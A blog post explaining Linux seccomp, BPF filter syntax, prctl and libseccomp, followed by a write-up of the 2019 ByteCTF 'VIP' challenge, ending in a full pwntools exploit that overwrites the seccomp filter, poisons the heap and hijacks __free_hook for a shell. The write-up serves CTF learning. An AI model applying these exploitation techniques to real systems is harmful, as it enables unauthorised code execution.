seccomp Sandbox Mechanism & 2019 ByteCTF VIP

2019/09/22

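0x00 The seccomp sandbox mechanism

seccomp is an application sandboxing mechanism provided by the Linux kernel. In its original (strict) mode, a sandboxed process may make only four system calls: exit(), sigreturn(), read(), and write(). If it makes any other system call, the kernel sends it SIGKILL.

seccomp was hard to adopt in practice because it was simply too restrictive, and Linus himself was skeptical about its usefulness, until seccomp-bpf appeared. seccomp-bpf is an extension of seccomp that lets a configurable filter decide which other system calls the application may make. The first use of seccomp-bpf in Chrome was to run Flash inside a sandbox (it really could not be trusted); the renderer process was later sandboxed as well.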

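0x01 BPF (Berkeley Packet Filter)

BPF is the native raw interface to the data link layer on Unix-like systems. It sends and receives link-layer packets and also supports packet filtering. Its filter rules are used in many places in Linux: xt_bpf for netfilter, cls_bpf in the kernel qdisc layer, seccomp-BPF, and a number of others such as the team driver and the PTP code.

BPF defines a pseudo-machine that executes code. It consists of a 32-bit accumulator A, a 32-bit index register X, a scratch memory of 16 32-bit words, and an implicit program counter, and it has load/store, arithmetic, and jump instructions.

Each instruction is represented by a predefined structure, sock_filter: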

struct sock_filter {            /* Filter block */
    __u16 code;                 /* Actual filter code */
    __u8  jt;                   /* Jump true */
    __u8  jf;                   /* Jump false */
    __u32 k;                    /* Generic multiuse field */
};

Much like real machine code, an array of these structures forms a BPF instruction sequence.
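As a rough illustration of that layout, the sketch below serializes single instructions the way they sit in memory on a little-endian machine such as x86-64. The helper name sock_filter and the two sample instructions are my own choices for illustration, not part of any library.

```python
import struct

# struct sock_filter: __u16 code, __u8 jt, __u8 jf, __u32 k
# "<HBBI" = little-endian u16, u8, u8, u32 (assumes a little-endian target).
SOCK_FILTER = struct.Struct("<HBBI")

def sock_filter(code, jt, jf, k):
    """Serialize one instruction (hypothetical helper for this sketch)."""
    return SOCK_FILTER.pack(code, jt, jf, k)

# 0x20: load the 32-bit word at absolute offset k into A
load_word0 = sock_filter(0x20, 0, 0, 0)
# 0x15: if A == k, skip jt instructions, otherwise skip jf instructions
jump_if_59 = sock_filter(0x15, 0, 1, 59)

print(SOCK_FILTER.size)       # size of one instruction in bytes
print(load_word0.hex())
print(jump_if_59.hex())
```

Every instruction is exactly 8 bytes, which is what makes it possible to count how many instructions fit into an overflow later on.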

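To make rules easier to write, two macros are provided for building instructions. They are defined in /usr/include/linux/filter.h; the opcode constants they take are defined in /usr/include/linux/bpf_common.h.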

#ifndef BPF_STMT
#define BPF_STMT(code, k) { (unsigned short)(code), 0, 0, k }
#endif
#ifndef BPF_JUMP
#define BPF_JUMP(code, k, jt, jf) { (unsigned short)(code), jt, jf, k }
#endif

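A BPF filter is simply a sequence of instructions built with these two macros and stored as an array of structures. The following filter blocks the execve system call: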

struct sock_filter filter[] = {
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),           // load the 4 bytes at offset 0 of the data (the system call number) into the accumulator
    BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),           // if A == 59, fall through to the next instruction; otherwise skip it. 59 is the x86-64 execve system call number
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),   // return KILL
    BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),  // return ALLOW
};

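After expansion, both macros are just initialized sock_filter structures; they are only a convenience wrapper.

The opcode passed to BPF_STMT and BPF_JUMP is composed of the following fields (the operand is the second argument):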
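To see how jt and jf steer execution, here is a minimal sketch of an interpreter that understands only the three opcodes used in the execve filter above. It is not the kernel's implementation. The seccomp_data layout (nr, arch, instruction_pointer, args[6]) comes from linux/seccomp.h; the function names are made up for this example.

```python
import struct

SECCOMP_RET_KILL = 0x00000000
SECCOMP_RET_ALLOW = 0x7FFF0000

# (code, jt, jf, k) tuples mirroring the execve filter above
FILTER = [
    (0x20, 0, 0, 0),                  # BPF_LD+BPF_W+BPF_ABS: A = word at offset 0
    (0x15, 0, 1, 59),                 # BPF_JMP+BPF_JEQ+BPF_K: A == 59 ? +0 : +1
    (0x06, 0, 0, SECCOMP_RET_KILL),   # BPF_RET+BPF_K
    (0x06, 0, 0, SECCOMP_RET_ALLOW),  # BPF_RET+BPF_K
]

def seccomp_data(nr, arch=0xC000003E, ip=0, args=(0,) * 6):
    """Pack struct seccomp_data: int nr; __u32 arch; __u64 ip; __u64 args[6]."""
    return struct.pack("<iIQ6Q", nr, arch, ip, *args)

def run(prog, data):
    """Interpret LD|W|ABS, JMP|JEQ|K and RET|K only (sketch, not the kernel)."""
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        pc += 1                        # jump offsets count from the next instruction
        if code == 0x20:
            acc = struct.unpack_from("<I", data, k)[0]
        elif code == 0x15:
            pc += jt if acc == k else jf
        elif code == 0x06:
            return k
        else:
            raise ValueError("opcode not covered by this sketch: %#x" % code)

print(hex(run(FILTER, seccomp_data(59))))   # execve
print(hex(run(FILTER, seccomp_data(1))))    # write
```

With the system call number 59 the jump falls through to the KILL return; any other number skips one instruction and lands on ALLOW.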

#define BPF_CLASS(code) ((code) & 0x07)         // instruction class
#define		BPF_LD		0x00                    // load a value into A (BPF_LD) or X (BPF_LDX)
#define		BPF_LDX		0x01
#define		BPF_ST		0x02                    // store A (BPF_ST) or X (BPF_STX) into scratch memory
#define		BPF_STX		0x03
#define		BPF_ALU		0x04                    // arithmetic or logic on the accumulator, with X or a constant as the operand
#define		BPF_JMP		0x05                    // jump instructions
#define		BPF_RET		0x06                    // terminate the filter and say how much of the packet to keep; returning 0 drops the whole packet
#define		BPF_MISC	0x07

/* ld/ldx fields */
#define BPF_SIZE(code)  ((code) & 0x18)         // operand size for loads
#define		BPF_W		0x00                    // 32-bit word
#define		BPF_H		0x08                    // 16-bit halfword
#define		BPF_B		0x10                    // single byte
#define BPF_MODE(code)  ((code) & 0xe0)         // addressing mode
#define		BPF_IMM		0x00
#define		BPF_ABS		0x20                    // absolute offset
#define		BPF_IND		0x40                    // offset relative to X
#define		BPF_MEM		0x60
#define		BPF_LEN		0x80
#define		BPF_MSH		0xa0
/* alu/jmp fields */
#define BPF_OP(code)    ((code) & 0xf0)         // for class ALU: which operation to perform
#define		BPF_ADD		0x00                    // see the definitions in filter.h for what each operation does
#define		BPF_SUB		0x10
#define		BPF_MUL		0x20
#define		BPF_DIV		0x30
#define		BPF_OR		0x40
#define		BPF_AND		0x50
#define		BPF_LSH		0x60
#define		BPF_RSH		0x70
#define		BPF_NEG		0x80
#define		BPF_MOD		0x90
#define		BPF_XOR		0xa0
#define		BPF_JA		0x00                    // for class JMP: which kind of jump
#define		BPF_JEQ		0x10
#define		BPF_JGT		0x20
#define		BPF_JGE		0x30
#define		BPF_JSET	0x40
#define BPF_SRC(code)   ((code) & 0x08)
#define		BPF_K		0x00                    // constant
#define		BPF_X		0x08
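The masks above can be applied in reverse to read an opcode byte. The sketch below decodes the three opcodes that appear in this post (0x20, 0x15, 0x06). The dictionaries and the decode function are illustrative names; the BPF_RVAL mask (0x18) and BPF_A (0x10) used for the RET class come from linux/filter.h rather than from the listing above.

```python
BPF_CLASSES = {0x00: "LD", 0x01: "LDX", 0x02: "ST", 0x03: "STX",
               0x04: "ALU", 0x05: "JMP", 0x06: "RET", 0x07: "MISC"}
BPF_SIZES = {0x00: "W", 0x08: "H", 0x10: "B"}
BPF_MODES = {0x00: "IMM", 0x20: "ABS", 0x40: "IND",
             0x60: "MEM", 0x80: "LEN", 0xA0: "MSH"}
BPF_JUMPS = {0x00: "JA", 0x10: "JEQ", 0x20: "JGT", 0x30: "JGE", 0x40: "JSET"}
BPF_SRCS = {0x00: "K", 0x08: "X"}
BPF_RVALS = {0x00: "K", 0x08: "X", 0x10: "A"}   # BPF_RVAL(code) = code & 0x18

def decode(code):
    """Split an opcode into its symbolic parts (covers LD/LDX, JMP and RET only)."""
    cls = BPF_CLASSES[code & 0x07]
    if cls in ("LD", "LDX"):
        return [cls, BPF_SIZES[code & 0x18], BPF_MODES[code & 0xE0]]
    if cls == "JMP":
        return [cls, BPF_JUMPS[code & 0xF0], BPF_SRCS[code & 0x08]]
    if cls == "RET":
        return [cls, BPF_RVALS[code & 0x18]]
    return [cls]

for opcode in (0x20, 0x15, 0x06):
    print(hex(opcode), "+".join("BPF_" + part for part in decode(opcode)))
```

This is why BPF_LD+BPF_W+BPF_ABS shows up as 0x20 and BPF_JMP+BPF_JEQ (with the implicit BPF_K) as 0x15 in disassembly listings.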

0x02 The prctl call

prctl is the call a C program uses to apply a BPF filter to its own process. Its prototype is:

#include <sys/prctl.h>
int prctl(int option, unsigned long arg2, unsigned long arg3,
          unsigned long arg4, unsigned long arg5);

There are many options; here I only care about PR_SET_NO_NEW_PRIVS (38) and PR_SET_SECCOMP (22).

PR_SET_NO_NEW_PRIVS (38)

PR_SET_NO_NEW_PRIVS (since Linux 3.5)
              Set the calling thread's no_new_privs bit to the value in  arg2.
              With  no_new_privs  set  to  1,  execve(2) promises not to grant
              privileges to do anything that could not have been done  without
              the  execve(2)  call (for example, rendering the set-user-ID and
              set-group-ID mode bits, and file  capabilities  non-functional).
              Once  set, this bit cannot be unset.  The setting of this bit is
              inherited by children created by fork(2) and clone(2), and
              preserved across execve(2).

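If the second argument of PR_SET_NO_NEW_PRIVS is set to 1, the thread can no longer gain privileges through execve; the option only affects the execve system call. In other words, a shell obtained through syscall(59, "/bin/sh", NULL, NULL) or system("/bin/sh") (which calls execve internally) keeps the same user and group as before and cannot gain higher privileges. For example, sudo fails in such a shell: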

test
$ whoami
po1lux
$ sudo su
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?

PR_SET_SECCOMP (22)

PR_SET_SECCOMP (since Linux 2.6.23)
   Set the secure computing (seccomp) mode for the calling  thread,
   to limit the available system calls.  The more recent seccomp(2)
   system  call  provides  a  superset  of  the  functionality   of
   PR_SET_SECCOMP.

   The  seccomp  mode is selected via arg2.  (The seccomp constants
   are defined in <linux/seccomp.h>.)

   With arg2 set to SECCOMP_MODE_STRICT, the only system calls that
   the  thread is permitted to make are read(2), write(2), _exit(2)
   (but not exit_group(2)), and sigreturn(2).  Other  system  calls
   result  in  the  delivery  of  a  SIGKILL signal.  Strict secure
   computing mode is useful for number-crunching applications  that
   may  need  to  execute  untrusted byte code, perhaps obtained by
   reading from a pipe or socket.  This operation is available only
   if the kernel is configured with CONFIG_SECCOMP enabled.

   With  arg2  set  to  SECCOMP_MODE_FILTER  (since Linux 3.5), the
   system calls allowed are defined by  a  pointer  to  a  Berkeley
   Packet  Filter  passed  in  arg3.  This argument is a pointer to
   struct sock_fprog; it can be designed to filter arbitrary system
   calls and system call arguments.  This mode is available only if
   the kernel is configured with CONFIG_SECCOMP_FILTER enabled.

   If SECCOMP_MODE_FILTER filters permit fork(2), then the  seccomp
   mode  is  inherited by children created by fork(2); if execve(2)
   is  permitted,  then  the  seccomp  mode  is  preserved   across
   execve(2).  If the filters permit prctl() calls, then additional
   filters can be added; they are run in order until the first non-
   allow result is seen.

   For   further   information,   see   the   kernel   source  file
   Documentation/prctl/seccomp_filter.txt.

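If arg2 is SECCOMP_MODE_STRICT (1), only the read, write, _exit (not exit_group), and sigreturn system calls are allowed. If arg2 is SECCOMP_MODE_FILTER (2), the thread is in filter mode, and the restrictions on system calls are defined by the custom filter rules in the structure passed as arg3.

prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);

prog is a struct sock_fprog, which looks like this: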

struct sock_fprog {
	unsigned short		len;	/* number of instructions */
	struct sock_filter *filter; /* pointer to the array of struct sock_filter */
};

filter points to an array of struct sock_filter, such as the struct sock_filter filter[] shown above.
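The in-memory shape of these two structures can be checked from Python with ctypes, which applies the platform's C padding rules. This is only a sketch: the class names SockFilter and SockFprog are mine, and nothing here is handed to the kernel.

```python
import ctypes

class SockFilter(ctypes.Structure):
    """Mirror of struct sock_filter."""
    _fields_ = [("code", ctypes.c_uint16),
                ("jt", ctypes.c_uint8),
                ("jf", ctypes.c_uint8),
                ("k", ctypes.c_uint32)]

class SockFprog(ctypes.Structure):
    """Mirror of struct sock_fprog: instruction count plus pointer."""
    _fields_ = [("len", ctypes.c_ushort),
                ("filter", ctypes.POINTER(SockFilter))]

# The four-instruction execve filter from the previous section.
insns = (SockFilter * 4)(
    SockFilter(0x20, 0, 0, 0),
    SockFilter(0x15, 0, 1, 59),
    SockFilter(0x06, 0, 0, 0x00000000),
    SockFilter(0x06, 0, 0, 0x7FFF0000),
)
prog = SockFprog(len(insns), ctypes.cast(insns, ctypes.POINTER(SockFilter)))

print(ctypes.sizeof(SockFilter), SockFprog.filter.offset, ctypes.sizeof(SockFprog))
print(prog.len, prog.filter[1].k)
```

On a 64-bit build the pointer is aligned to 8 bytes, so len is followed by padding and filter sits at offset 8. That matches the two adjacent stack slots 8 bytes apart that hold the length and the pointer in the decompiled challenge binary in section 0x04.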

Disabling the execve system call with prctl

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>
#include <linux/filter.h>

int main(void)
{
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD+BPF_W+BPF_ABS,0),           // A = system call number
        BPF_JUMP(BPF_JMP+BPF_JEQ,59,0,1),           // execve ? fall through : skip one
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_KILL),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter)/sizeof(filter[0])), // number of instructions
        .filter = filter,                                          // pointer to the instruction array
    };
    prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);             // required before an unprivileged process may install a filter
    prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
    write(1,"test\n",5);                            // write to stdout
    system("/bin/sh");
    return 0;
}

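0x03 The seccomp library (unrelated to reproducing 2019 ByteCTF VIP)

The libseccomp library provides functions that achieve much the same effect as prctl. Because it wraps the details, you can build filters without knowing the BPF rules.

To use it in a C program, a few packages have to be installed first:

sudo apt install libseccomp-dev libseccomp2 seccomp

Disabling the execve system call with the library's functions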

//gcc seccomptest.c -o seccomptest -lseccomp
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
	scmp_filter_ctx ctx;
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
	seccomp_load(ctx);

	char * str = "/bin/sh";
	write(1,"i will give you a shell\n",24);
	syscall(59,str,NULL,NULL);//execve
	return 0;
}

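scmp_filter_ctx is the filter context type.
seccomp_init initializes the context. With SCMP_ACT_ALLOW as the default action the filter works as a blacklist; with SCMP_ACT_KILL it works as a whitelist: every system call is denied by default, and any call that matches no rule kills the process.

scmp_filter_ctx seccomp_init(uint32_t def_action);

def_action is one of: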

/*
 * seccomp actions
 */

/**
 * Kill the process
 */
#define SCMP_ACT_KILL		0x00000000U
/**
 * Throw a SIGSYS signal
 */
#define SCMP_ACT_TRAP		0x00030000U
/**
 * Return the specified error code
 */
#define SCMP_ACT_ERRNO(x)	(0x00050000U | ((x) & 0x0000ffffU))
/**
 * Notify a tracing process with the specified value
 */
#define SCMP_ACT_TRACE(x)	(0x7ff00000U | ((x) & 0x0000ffffU))
/**
 * Allow the syscall to be executed after the action has been logged
 */
#define SCMP_ACT_LOG		0x7ffc0000U
/**
 * Allow the syscall to be executed
 */
#define SCMP_ACT_ALLOW		0x7fff0000U

seccomp_rule_add adds a rule:

int seccomp_rule_add(scmp_filter_ctx ctx, uint32_t action, int syscall, unsigned int arg_cnt, ...);

arg_cnt says whether the system call's arguments are constrained, and how many argument constraints follow. To allow or forbid a system call unconditionally, pass 0: seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0) disables execve regardless of its arguments.

For finer control, first look up the arguments of the system call in question, then filter on them with the SCMP_AX and SCMP_CMP_XX families of macros. Take read as an example; its prototype is:

ssize_t read(int fd, void *buf, size_t count);

The following rule forbids reading exactly 100 bytes from standard input (stdin):

seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(read), 2,
                SCMP_A0(SCMP_CMP_EQ, STDIN_FILENO),
                SCMP_A2(SCMP_CMP_EQ, 100));

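seccomp_load loads the filter into the kernel. seccomp_reset re-initializes the filter context; it does not remove a filter that has already been loaded.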

0x04 2019 ByteCTF VIP

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

1.alloc
2.show
3.free
4.edit
5.exit
6.become vip

Option 4 (edit) has a heap overflow: it can write an arbitrary number of bytes, but the content is not controllable.

if ( dword_4040E0 )
  return read(0, a1, a2);
fd = open("/dev/urandom", 0);
if ( fd == -1 )
  exit(0);
return read(fd, a1, a2);

Option 6 (become vip) has a stack overflow. buf is 0x20 bytes long:

char buf; // [rsp+10h] [rbp-80h]
char v4; // [rsp+30h] [rbp-60h]

but 0x50 bytes can be read into it:

read(0, &buf, 0x50uLL);

The same function installs a seccomp system call filter:

if ( prctl(22, 2LL, &v1) < 0 )
{
  perror("prctl(PR_SET_SECCOMP)");
  exit(2);
}

v1 is the sock_fprog structure described above, so v2 is its pointer to the BPF sock_filter array:

__int16 v1; // [rsp+0h] [rbp-90h]
char *v2; // [rsp+8h] [rbp-88h]
char buf; // [rsp+10h] [rbp-80h]
char v4; // [rsp+30h] [rbp-60h]

Look at the assignments that follow:

v1 = 11;
v2 = &v4;

The filter has 11 instructions and the filter pointer points at v4, which buf can overflow into.
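The numbers quoted so far determine how much of the filter is under our control. The arithmetic below is a small worked check using only the offsets from the decompiler output; the variable names are mine.

```python
BUF_OFF = 0x80       # buf lives at rbp-0x80
FILTER_OFF = 0x60    # v4 (the sock_filter array) lives at rbp-0x60
READ_LEN = 0x50      # read(0, &buf, 0x50)
INSN_SIZE = 8        # sizeof(struct sock_filter)
FILTER_LEN = 11      # v1 = 11

padding = BUF_OFF - FILTER_OFF          # bytes needed to reach v4
overwritable = READ_LEN - padding       # bytes of the filter we can replace
insns = overwritable // INSN_SIZE       # whole instructions we control
untouched = FILTER_LEN - insns          # original instructions left behind

print(hex(padding), hex(overwritable), insns, untouched)
```

So the payload is 0x20 bytes of padding followed by at most 6 instructions. The remaining 5 original instructions stay in place but are never executed as long as every path through the injected 6 ends in a return.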

Approach

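Overwrite the BPF filter rules so that open returns 0. In the edit function, read(fd, a1, a2) then becomes read(0, a1, a2), so the heap overflow content becomes controllable, and the rest is a routine getshell.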
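The trick relies on how an ERRNO action is encoded: the upper 16 bits select the action and the lower 16 bits carry the error number, which the kernel hands back (negated) as the system call's result without running the call. A minimal sketch, with constants from linux/seccomp.h and helper names invented for this example:

```python
SECCOMP_RET_ERRNO = 0x00050000
SECCOMP_RET_ACTION_FULL = 0xFFFF0000
SECCOMP_RET_DATA = 0x0000FFFF

def ret_errno(err):
    """Filter return value for 'fail this syscall with errno err'."""
    return SECCOMP_RET_ERRNO | (err & SECCOMP_RET_DATA)

def raw_syscall_result(ret):
    """Raw result the skipped syscall appears to return (sketch of the kernel rule)."""
    if (ret & SECCOMP_RET_ACTION_FULL) != SECCOMP_RET_ERRNO:
        raise ValueError("not an ERRNO action")
    return -(ret & SECCOMP_RET_DATA)

print(hex(ret_errno(0)), raw_syscall_result(ret_errno(0)))
print(hex(ret_errno(13)), raw_syscall_result(ret_errno(13)))
```

With an error number of 0 the raw result is 0, which libc does not treat as a failure, so open hands back 0 as if it were a valid descriptor and the subsequent read uses stdin.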

Problems and fixes

$rax   : 0x101             
......
───────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffde90│+0x0000: 0x0000000000000000	 ← $rsp
......
─────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7af3c87 <open64+71>      mov    edi, 0xffffff9c
 → 0x7ffff7af3c8c <open64+76>      syscall 
......

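#cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h | grep 257
#define __NR_openat 257

The open function actually issues the openat system call (rax = 0x101 = 257 at the syscall instruction above).

Generate the rules with seccomp-tools. Each instruction is 8 bytes and the overflow covers 48 bytes, so at most 6 instructions fit. Following the seccomp-tools documentation, write the rules: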

#cat 1.asm
A = sys_number
A == 257? e0:next
A == 1? ok:next
return ALLOW
e0:
return ERRNO(0)
ok:
return ALLOW

The resulting rules:

 #seccomp-tools asm 1.asm -f raw |seccomp-tools disasm -
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x02 0x00 0x00000101  if (A == openat) goto 0004
 0002: 0x15 0x02 0x00 0x00000001  if (A == write) goto 0005
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0004: 0x06 0x00 0x00 0x00050000  return ERRNO(0)
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
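Each row of this listing is one 8-byte sock_filter. As a cross-check, the sketch below decodes the raw bytes of the same program (the escaped string that seccomp-tools asm 1.asm prints) back into the CODE/JT/JF/K columns and resolves the jump targets. The function names are illustrative.

```python
import struct

RAW = (b"\x20\x00\x00\x00\x00\x00\x00\x00"
       b"\x15\x00\x02\x00\x01\x01\x00\x00"
       b"\x15\x00\x02\x00\x01\x00\x00\x00"
       b"\x06\x00\x00\x00\x00\x00\xFF\x7F"
       b"\x06\x00\x00\x00\x00\x00\x05\x00"
       b"\x06\x00\x00\x00\x00\x00\xFF\x7F")

def disasm(raw):
    """Return one formatted row per instruction, in the column order of the listing."""
    rows = []
    for line, (code, jt, jf, k) in enumerate(struct.iter_unpack("<HBBI", raw)):
        rows.append(" %04d: 0x%02x 0x%02x 0x%02x 0x%08x" % (line, code, jt, jf, k))
    return rows

def jump_targets(raw):
    """Map each conditional jump's line to (target if true, target if false)."""
    targets = {}
    for line, (code, jt, jf, _k) in enumerate(struct.iter_unpack("<HBBI", raw)):
        if code & 0x07 == 0x05:              # BPF_JMP class
            targets[line] = (line + 1 + jt, line + 1 + jf)
    return targets

for row in disasm(RAW):
    print(row)
print(jump_targets(RAW))
```

The jump offsets are relative to the following instruction, which is how JT = 0x02 on line 0001 becomes "goto 0004".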

Generate the escaped byte string:

#seccomp-tools asm 1.asm
"\x20\x00\x00\x00\x00\x00\x00\x00\x15\x00\x02\x00\x01\x01\x00\x00\x15\x00\x02\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\xFF\x7F\x06\x00\x00\x00\x00\x00\x05\x00\x06\x00\x00\x00\x00\x00\xFF\x7F"

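In the rest of the exploit, controllable data could now be written to the heap, but getting a shell failed with:

sh: error while loading shared libraries: /lib/x86_64-linux-gnu/tls/x86_64/x86_64/libc.so.6: cannot read file data: Error 9

The arguments to system were correct. With huai's help, I suspected that system itself ends up calling open and that the filter was breaking it. Tracing a C program that contains only system("/bin/sh") confirms that openat is called along the way: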

#strace ./test
execve("./system", ["./system"], 0x7fff84f88350 /* 52 vars */) = 0
brk(NULL)                               = 0x55bbaa268000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=74811, ...}) = 0
mmap(NULL, 74811, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f60d1b70000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
......

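So rewrite the filter to match only the specific file being opened, which leaves system unaffected.

#man openat
int openat(int dirfd, const char *pathname, int flags);

In the openat prototype, the second argument is a pointer to the pathname string, so the filter should match on the second argument. In the binary, the string /dev/urandom is located at 0x40207e. The rules are: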

#cat 2.asm
A = sys_number
A != 257 ? ok : next
A = args[1]
A != 0x40207e ? ok:next 
return ERRNO(0)
ok:
return ALLOW

After generating the bytes and overwriting the filter with them, the shell works normally.
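For readers without seccomp-tools at hand, the second rule set can also be assembled by hand. The sketch below is my own translation of 2.asm into (code, jt, jf, k) tuples, with the args[1] offset derived from the seccomp_data layout (nr, arch, instruction_pointer, then args). The expected bytes are the filter0 string used in the exploit below, written out as hex.

```python
import struct

SYS_OPENAT = 257
URANDOM_STR = 0x40207E            # address of "/dev/urandom" quoted in the text
ARGS1_OFF = 4 + 4 + 8 + 8 * 1     # skip nr, arch, instruction_pointer, args[0]

LD_W_ABS, JEQ_K, RET_K = 0x20, 0x15, 0x06
ERRNO_0, ALLOW = 0x00050000, 0x7FFF0000

PROG = [
    (LD_W_ABS, 0, 0, 0),            # A = sys_number
    (JEQ_K,    0, 3, SYS_OPENAT),   # A != 257 ? ok : next
    (LD_W_ABS, 0, 0, ARGS1_OFF),    # A = args[1] (low 32 bits of the pointer)
    (JEQ_K,    0, 1, URANDOM_STR),  # A != 0x40207e ? ok : next
    (RET_K,    0, 0, ERRNO_0),      # return ERRNO(0)
    (RET_K,    0, 0, ALLOW),        # ok: return ALLOW
]

raw = b"".join(struct.pack("<HBBI", *insn) for insn in PROG)

# filter0 from the exploit, one instruction per chunk
EXPECTED = bytes.fromhex(
    "2000000000000000" "1500000301010000" "2000000018000000"
    "150000017e204000" "0600000000000500" "060000000000ff7f"
)

print(ARGS1_OFF, len(raw), raw == EXPECTED)
```

A "not equal" test in the assembly becomes a JEQ with the branches swapped: jt = 0 falls through and jf carries the distance to the ok label. The program is exactly 6 instructions (48 bytes), so it just fits into the overflow.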

EXP

from pwn import *
p = process("./vip")
elf = ELF("./vip")
libc = ELF('./libc.so.6')
context.log_level = "debug"

def add(index):
    p.sendlineafter('choice: ', '1')
    p.sendlineafter('Index: ', str(index))
def edit(index, size, content):
    p.sendlineafter('choice: ', '4')
    p.sendlineafter('Index: ', str(index))
    p.sendlineafter('Size: ', str(size))
    p.sendafter('Content: ', content)
def delete(index):
    p.sendlineafter('choice: ', '3')
    p.sendlineafter('Index: ', str(index))
def show(index):
    p.sendlineafter('choice: ', '2')
    p.sendlineafter('Index: ', str(index))
def q():
    gdb.attach(p)
    raw_input("pause")

def pwn():
    filter0 = "\x20\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x03\x01\x01\x00\x00\x20\x00\x00\x00\x18\x00\x00\x00\x15\x00\x00\x01\x7e\x20\x40\x00\x06\x00\x00\x00\x00\x00\x05\x00\x06\x00\x00\x00\x00\x00\xFF\x7F"
    p.sendlineafter('choice: ', '6')
    p.sendafter('name: ', 'a' * 32 + filter0)

    add(0)
    add(1)
    add(2)
    add(3)
    delete(3)
    delete(2)
    delete(1)
    edit(0,0x50+0x20,"\x00"*0x58+p64(0x61)+p64(0x404100))
    add(4)
    add(5)
    edit(5,0x8,p64(elf.got['puts']))
    show(0)
    libc.address = u64(p.recv(6).ljust(8,'\x00')) - libc.sym['puts']
    log.info("libc_base:"+hex(libc.address))
    edit(5,0x10,p64(libc.sym['__free_hook'])+p64(libc.search('/bin/sh').next()))
    edit(0,0x8,p64(libc.sym['system']))
    delete(1)
    p.interactive()
pwn()

0x05 REFERENCE

Author: Po1lux

Original link: http://yoursite.com/2019/09/22/seccomp沙箱机制 & 2019ByteCTF VIP/

Published: September 22nd 2019, 9:54:01 pm

Updated: October 20th 2019, 11:20:42 am


